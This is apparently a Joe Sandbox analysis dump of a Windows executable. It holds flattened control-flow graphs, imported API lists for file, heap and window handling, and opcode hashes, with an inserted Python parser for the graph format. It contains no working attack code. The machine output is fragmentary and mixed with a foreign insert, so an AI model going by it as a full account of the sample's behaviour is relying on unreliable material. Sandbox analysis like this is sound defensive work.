8148 14000d108 memset 8145->8148 8146->8147 8150 14000d0ae wcslen HeapAlloc wcscpy 8146->8150 8147->8116 8148->8147 8149->8145 8150->8145 8152 14000cfa2 8151->8152 8154 14000cfe2 8151->8154 8153 14000d3a4 tolower 8152->8153 8155 14000cfa7 8153->8155 8154->8155 8156 14000cff8 wcscmp 8154->8156 8155->8141 8156->8154 8156->8155 8158 14000d3c7 tolower 8157->8158 8159 14000d3b8 8158->8159 8160 14000d3d0 8158->8160 8159->8158 8160->8142 8300 140003144 8301 140003147 8300->8301 8302 140012360 HeapFree 8301->8302 8303 140003156 8302->8303 8304 140012360 HeapFree 8303->8304 8305 140003168 8304->8305 7770 140002648 7771 14000264f 7770->7771 7772 140012360 HeapFree 7771->7772 7773 140002666 7772->7773 7774 140012360 HeapFree 7773->7774 7775 140002678 7774->7775 7776 140012360 HeapFree 7775->7776 7777 14000268a 7776->7777 7778 140012360 HeapFree 7777->7778 7779 14000269c 7778->7779 7780 140012360 HeapFree 7779->7780 7781 1400026ae 7780->7781 8161 1400088c9 8162 1400088e0 8161->8162 8163 1400088fa 8161->8163 8164 140009da0 _wcsicmp 8162->8164 8166 1400088eb 8162->8166 8165 14000afc0 _wcsicmp 8163->8165 8163->8166 8164->8166 8165->8166 7782 14000b64c 7783 14000b667 7782->7783 7784 14000b70e UnregisterClassW 7782->7784 7785 14000b68b 7783->7785 7787 14000b674 DefWindowProcW 7783->7787 7788 14000b67f 7783->7788 7786 14000b72c 7784->7786 7785->7786 7789 14000b6ea EnableWindow 7785->7789 7790 14000b6fc 7785->7790 7787->7786 7788->7785 7791 14000b695 GetWindowLongPtrW GetWindowTextLengthW HeapAlloc GetWindowTextW 7788->7791 7789->7790 7794 14000bf44 7790->7794 7791->7785 7795 14000bf57 EnumWindows 7794->7795 7796 14000bfbb 7794->7796 7798 14000b703 DestroyWindow 7795->7798 7799 14000bf77 GetCurrentThreadId 7795->7799 7797 14000bfc7 GetCurrentThreadId 7796->7797 7796->7798 7801 14000bfdb EnableWindow 7796->7801 7803 14000bff0 SetWindowPos 7796->7803 7805 140011c68 7796->7805 7797->7796 7798->7786 7800 14000bf85 7799->7800 7800->7798 7800->7799 7802 14000bf8b SetWindowPos 7800->7802 
7801->7796 7802->7800 7803->7796 7806 140011c74 HeapFree 7805->7806 7808 14001f820 7806->7808 8167 1400130cb 8169 1400130d0 8167->8169 8168 140014d80 3 API calls 8172 140013480 8168->8172 8170 1400132ba 8169->8170 8171 1400132aa memmove 8169->8171 8170->8168 8170->8172 8171->8170 8306 140002b4c 8307 1400123e0 21 API calls 8306->8307 8308 140002b6a 8307->8308 8391 140016fd0 8392 140017000 8391->8392 8392->8392 8393 14001700b MultiByteToWideChar malloc MultiByteToWideChar 8392->8393 7510 14000de50 7528 1400112a8 EnterCriticalSection 7510->7528 7512 14000de98 7513 14000deb6 7512->7513 7514 14000defb 7512->7514 7522 14000e04d 7512->7522 7515 14000dec9 7513->7515 7516 14000decd CreateFileW 7513->7516 7517 14000df42 7514->7517 7518 14000df00 7514->7518 7515->7516 7524 14000dfb7 7516->7524 7521 14000df5f CreateFileW 7517->7521 7517->7524 7519 14000df13 7518->7519 7520 14000df17 CreateFileW 7518->7520 7519->7520 7520->7524 7523 14000df8d CreateFileW 7521->7523 7521->7524 7523->7524 7524->7522 7525 14000dfe1 HeapAlloc 7524->7525 7526 14000dff9 7524->7526 7525->7526 7526->7522 7527 14000e036 SetFilePointer 7526->7527 7527->7522 7529 1400112e3 7528->7529 7530 1400112d0 7528->7530 7531 140011312 7529->7531 7532 1400112e9 HeapReAlloc 7529->7532 7533 140011cb0 HeapAlloc 7530->7533 7535 14001132d HeapAlloc 7531->7535 7537 14001131d 7531->7537 7532->7531 7534 1400112de 7533->7534 7536 140011352 LeaveCriticalSection 7534->7536 7535->7537 7536->7512 7537->7536 8173 1400086d0 8174 140008701 8173->8174 8175 1400086ee 8173->8175 8176 140008710 CharLowerW CharLowerW 8174->8176 8177 14000873e 8174->8177 8176->8174 8176->8177 7809 140002853 7830 1400123e0 7809->7830 7813 14000286b 7843 1400121c0 GetLastError TlsGetValue SetLastError 7813->7843 7815 140002889 7844 140012450 7815->7844 7817 140002898 7849 1400121c0 GetLastError TlsGetValue SetLastError 7817->7849 7819 1400028a6 7850 1400121c0 GetLastError TlsGetValue SetLastError 7819->7850 7821 1400028ba 7851 14000c8e0 7821->7851 7825 
1400028d4 7856 1400125d0 TlsGetValue 7825->7856 7827 1400028e5 7857 14000b574 7827->7857 7829 1400028fb 7831 1400123ed 7830->7831 7832 14001240f TlsGetValue 7830->7832 7835 140012060 5 API calls 7831->7835 7833 140002861 7832->7833 7834 140012420 7832->7834 7842 1400121c0 GetLastError TlsGetValue SetLastError 7833->7842 7873 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7834->7873 7836 1400123f2 TlsGetValue 7835->7836 7864 140016cc4 7836->7864 7839 140012425 TlsGetValue 7841 140016cc4 13 API calls 7839->7841 7841->7833 7842->7813 7843->7815 7845 140012477 7844->7845 7846 140012469 wcslen 7844->7846 7847 1400126d0 2 API calls 7845->7847 7846->7845 7848 140012485 7847->7848 7848->7817 7849->7819 7850->7821 7852 14000c8f0 7851->7852 7853 1400126d0 2 API calls 7852->7853 7854 1400028ca 7853->7854 7855 140012520 TlsGetValue 7854->7855 7855->7825 7856->7827 7874 14000be5c GetForegroundWindow 7857->7874 7860 14000bf44 7 API calls 7861 14000b5a3 MessageBoxW 7860->7861 7862 14000bf44 7 API calls 7861->7862 7863 14000b5bf 7862->7863 7863->7829 7865 140016cf2 TlsAlloc InitializeCriticalSection 7864->7865 7866 140016d11 TlsGetValue 7864->7866 7865->7866 7867 140016de6 HeapAlloc 7866->7867 7868 140016d29 HeapAlloc 7866->7868 7869 14001240d 7867->7869 7868->7869 7870 140016d49 EnterCriticalSection 7868->7870 7869->7833 7871 140016d61 7 API calls 7870->7871 7872 140016d5e 7870->7872 7871->7867 7872->7871 7873->7839 7875 14000b596 7874->7875 7876 14000be76 GetWindowThreadProcessId GetCurrentProcessId 7874->7876 7875->7860 7876->7875 8394 1400031d9 8395 1400031dc 8394->8395 8396 140012360 HeapFree 8395->8396 8397 1400031eb 8396->8397 8398 14000c3dc GetEnvironmentVariableW 8399 14000c408 8398->8399 8400 1400126d0 2 API calls 8399->8400 8401 14000c413 GetEnvironmentVariableW 8400->8401 8178 1400076e0 8179 14000773d 8178->8179 8181 1400076f1 8178->8181 8180 140007729 wcsstr 8180->8179 8181->8179 8181->8180 8315 140007760 8316 1400077e7 8315->8316 8317 140007769 8315->8317 8317->8316 8318 
1400077b9 8317->8318 8319 1400077c0 wcsstr 8317->8319 8322 1400085f0 8318->8322 8321 1400077be 8319->8321 8323 14000869f 8322->8323 8324 140008617 CharLowerW 8322->8324 8323->8321 8325 140008630 8324->8325 8325->8323 8325->8325 8326 14000864c CharLowerW 8325->8326 8327 140008670 CharLowerW CharLowerW 8325->8327 8326->8325 8327->8325

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                              • String ID: GetLongPathNameW$Kernel32.DLL
                                                              • API String ID: 820969696-2943376620
                                                              • Opcode ID: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction ID: 08c74a34c6d82e646fe97c561cc400b119dc1938ee8d5d8dcc972cb306c03a44
                                                              • Opcode Fuzzy Hash: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction Fuzzy Hash: 17116D31721B4086EF159F27A9843A967A1FB8CFC0F481029EF4E4B7A5DE39C8528340

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 4232179356-0
                                                              • Opcode ID: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction ID: 2ef6d83f5e2b3c8fb19d65fceeff62dc40447b47a2c1a218917e14d6a90cbc88
                                                              • Opcode Fuzzy Hash: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction Fuzzy Hash: E38162FBE69644E5EA07B763BC86BED5220D3AD3D4F504410FF08062A3EE3995E64B10

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
                                                              • String ID:
                                                              • API String ID: 2685021396-0
                                                              • Opcode ID: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction ID: 9fd7d13fb8664e67d48ce56ae15862c74b29b4b7423edb5d501112f331116329
                                                              • Opcode Fuzzy Hash: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction Fuzzy Hash: 2B51D4B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                                              • String ID:
                                                              • API String ID: 2499486723-0
                                                              • Opcode ID: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction ID: 5e2f233be3bb1e1a489454234068146e28d45b36aeb09ace1181e30b51997f55
                                                              • Opcode Fuzzy Hash: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction Fuzzy Hash: 6C722BB6E25548D6EA16B7B7B8877E95220A3AD394F500411FF4C0B363EE39C5F64B10

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FilePointermemmove
                                                              • String ID:
                                                              • API String ID: 2366752189-0
                                                              • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                                              • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$FreeHeap
                                                              • String ID:
                                                              • API String ID: 74418370-0
                                                              • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                                              • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00
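
The `control_flow_graph` lines in this report are a flat token stream (block headers, API annotations, `a->b` edges) that is hard to read by eye. The following is an added example, not part of the Joe Sandbox report or its IDA plugin: a small Python parser for that format, run on the edge list for the function at 14000e3f0 shown on this page, that recovers the basic blocks, the entry and exit blocks, the self-loops (the copy loops at 516 and 520), the intra-module call targets, and the sequence of imported APIs seen along each loop-free path. The token grammar is inferred from the listings on this page and is an assumption; the function and field names are the example's own.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Edge list for the function at 14000e3f0, copied from the report above (process 17 dump).
CFG_14000E3F0 = (
    "control_flow_graph 509 14000e3f0-14000e404 510 14000e4f3-14000e4fd 509->510 "
    "511 14000e40a-14000e40e 509->511 511->510 512 14000e414-14000e418 511->512 "
    "513 14000e483-14000e4a6 call 14000e770 512->513 514 14000e41a-14000e423 512->514 "
    "521 14000e4a8-14000e4b5 513->521 522 14000e4ee 513->522 516 14000e451-14000e45b 514->516 "
    "517 14000e425 514->517 516->516 518 14000e45d-14000e482 WriteFile 516->518 "
    "520 14000e430-14000e43a 517->520 520->520 523 14000e43c-14000e450 call 14000e620 520->523 "
    "524 14000e4c5-14000e4d6 WriteFile 521->524 525 14000e4b7-14000e4ba call 14000e620 521->525 "
    "522->510 528 14000e4dc-14000e4e8 HeapFree 524->528 530 14000e4bf-14000e4c3 525->530 "
    "528->522 530->528"
)

RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")  # "<start>" or "<start>-<end>", hex
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")                     # "<src>-><dst>", decimal node ids


@dataclass
class Block:
    node: int
    start: int                                  # first instruction address
    end: int                                    # last instruction address (== start for 1-insn blocks)
    apis: list = field(default_factory=list)    # imported APIs named on this block
    calls: list = field(default_factory=list)   # intra-module targets from "call <addr>"


@dataclass
class CFG:
    blocks: dict                                # node id -> Block
    edges: list = field(default_factory=list)
    succ: dict = field(default_factory=lambda: defaultdict(list))
    pred: dict = field(default_factory=lambda: defaultdict(list))


def parse_cfg(text: str) -> CFG:
    """Parse one 'control_flow_graph ...' line.  Assumed grammar (inferred from the report):
    '<node> <start>[-<end>]' opens a block, 'call <hex>' or a bare API name annotates the
    current block, '<a>-><b>' is an edge.  Node ids are decimal, addresses hex, so a decimal
    token followed by an address-looking token is treated as a block header."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    cfg, cur, i = CFG(blocks={}), None, 0
    while i < len(toks):
        tok = toks[i]
        if m := EDGE_RE.match(tok):
            a, b = int(m.group(1)), int(m.group(2))
            cfg.edges.append((a, b)); cfg.succ[a].append(b); cfg.pred[b].append(a)
            i += 1
        elif tok.isdigit() and i + 1 < len(toks) and (rm := RANGE_RE.match(toks[i + 1])):
            start = int(rm.group(1), 16)
            end = int(rm.group(2), 16) if rm.group(2) else start
            cur = cfg.blocks[int(tok)] = Block(int(tok), start, end)
            i += 2
        elif cur is None:
            raise ValueError(f"annotation {tok!r} before any block header")
        elif tok == "call" and i + 1 < len(toks) and RANGE_RE.match(toks[i + 1]):
            cur.calls.append(int(toks[i + 1], 16)); i += 2
        else:
            cur.apis.append(tok); i += 1
    return cfg


def entry_block(cfg: CFG) -> int:
    """The single block with no predecessors; lowest address if the graph is irregular."""
    roots = [n for n in cfg.blocks if not cfg.pred.get(n)]
    return roots[0] if len(roots) == 1 else min(cfg.blocks, key=lambda n: cfg.blocks[n].start)


def exit_blocks(cfg: CFG) -> list:
    return sorted(n for n in cfg.blocks if not cfg.succ.get(n))


def loop_blocks(cfg: CFG) -> list:
    """Blocks with a self edge (tight loops such as byte-copy loops)."""
    return sorted(a for a, b in cfg.edges if a == b)


def blocks_calling(cfg: CFG, api: str) -> list:
    return sorted(n for n, b in cfg.blocks.items() if api in b.apis)


def call_targets(cfg: CFG) -> list:
    return sorted({t for b in cfg.blocks.values() for t in b.calls})


def simple_paths(cfg: CFG, entry: int) -> list:
    """Loop-free paths from entry; a path ends when no unvisited successor remains."""
    paths = []

    def walk(node, path):
        nxt = [s for s in cfg.succ.get(node, []) if s not in path]
        if not nxt:
            paths.append(path)
        for s in nxt:
            walk(s, path + [s])

    walk(entry, [entry])
    return paths


def api_sequences(cfg: CFG) -> set:
    """Distinct ordered API sequences observable along loop-free paths from the entry."""
    return {tuple(a for n in p for a in cfg.blocks[n].apis)
            for p in simple_paths(cfg, entry_block(cfg))}


if __name__ == "__main__":
    cfg = parse_cfg(CFG_14000E3F0)
    e = entry_block(cfg)
    print(f"entry {e} @ {cfg.blocks[e].start:x}: {len(cfg.blocks)} blocks, {len(cfg.edges)} edges")
    print("exits:", exit_blocks(cfg), "self-loops:", loop_blocks(cfg))
    print("WriteFile in blocks:", blocks_calling(cfg, "WriteFile"))
    print("internal call targets:", [hex(t) for t in call_targets(cfg)])
    for seq in sorted(api_sequences(cfg)):
        print("API sequence:", " -> ".join(seq) or "(none)")
```

The same parser applies unchanged to the other `control_flow_graph` lines in this report; pasting several of them through `api_sequences` is a quick way to find which functions pair an allocation or attribute change with a write or delete, which is what the Similarity "API ID" strings summarise without the ordering.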

                                                               Control-flow Graph

                                                               • Basic blocks (node: address range, APIs called) and edges, recovered from the rendered graph; the executed / not-executed colouring of the image is not preserved in text:
                                                               • 531: 14000e770-14000e7b7, WideCharToMultiByte -> 532, 533
                                                               • 532: 14000e7b9-14000e7d6, HeapAlloc -> 534, 535
                                                               • 533: 14000e81f-14000e822 -> 536
                                                               • 534: 14000e804 -> 536
                                                               • 535: 14000e7d8-14000e801, WideCharToMultiByte -> 534
                                                               • 536: 14000e809-14000e81e (no successors)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocHeap
                                                              • String ID:
                                                              • API String ID: 3475569825-0
                                                              • Opcode ID: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction ID: ae5164d7e213c5423ce426761272d4060c1fe25f0e8d52ef4d31f29a04fa76ea
                                                              • Opcode Fuzzy Hash: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction Fuzzy Hash: D9112B72615B8082E754DF26B84435AB7A5FBC8BD0F148228EF9D63BA4DF38C5229704

                                                               Control-flow Graph

                                                               • Basic blocks (node: address range, APIs called) and edges, recovered from the rendered graph; the executed / not-executed colouring of the image is not preserved in text:
                                                               • 537: 14000d914-14000d922 -> 538, 539
                                                               • 538: 14000d924-14000d95a, wcsncpy, wcslen -> 540, 541
                                                               • 539: 14000d99e -> 542
                                                               • 540: 14000d98a-14000d99c, CreateDirectoryW -> 542
                                                               • 541: 14000d95c-14000d96b -> 540, 543
                                                               • 542: 14000d9a0-14000d9a8 (no successors)
                                                               • 543: 14000d96d-14000d97b -> 540, 544
                                                               • 544: 14000d97d-14000d988 -> 540, 541
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectorywcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 961886536-0
                                                              • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                                              • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

                                                               Control-flow Graph

                                                               • Single basic block (node: address range, APIs called), recovered from the rendered graph; the executed / not-executed colouring of the image is not preserved in text:
                                                               • 545: 14000b538-14000b573, memset, InitCommonControlsEx, CoInitialize (no successors)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CommonControlsInitInitializememset
                                                              • String ID:
                                                              • API String ID: 2179856907-0
                                                              • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                                              • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$Value
                                                              • String ID:
                                                              • API String ID: 3898337583-0
                                                              • Opcode ID: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction ID: 13d1d2221b5dfffbe944c94766c5cf34ad854dcf92a9a233d77868c63a58341b
                                                              • Opcode Fuzzy Hash: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction Fuzzy Hash: BA21A336609B40C6DA21CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CodeExitProcess
                                                              • String ID: open
                                                              • API String ID: 3861947596-2758837156
                                                              • Opcode ID: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction ID: e85bff13557fc8eee7e7e221a0258bb1a2e766680f88975b06e903b36e14beee
                                                              • Opcode Fuzzy Hash: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction Fuzzy Hash: 44315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                                                • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                                                • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                                                • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                                                • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                                                • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                                                • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                                                • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
